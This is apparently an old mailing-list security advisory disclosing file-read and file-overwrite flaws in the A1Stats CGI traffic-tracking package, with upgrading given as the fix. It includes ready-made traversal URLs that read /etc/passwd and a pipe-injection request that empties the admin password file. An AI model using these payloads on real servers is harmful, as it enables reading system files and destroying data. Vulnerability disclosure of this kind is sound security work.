Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
[ ADV-0114 ]
/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic.
The package has a view files bug and also gives the
possibility to overwrite existing files.
/-|=[who is vulnerable]=|-\
Anyone using a A1Stats that was downloaded before
24/04/01.
/-|=[testing it]=|-\
To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
These two will give you /etc/passwd.
www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.
One can also open a file and wreck its contents.
http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.
/-|=[fix]=|-\
Downloading the latest version will solve this
problem.
Free, encrypted, secure Web-based email at www.hushmail.com
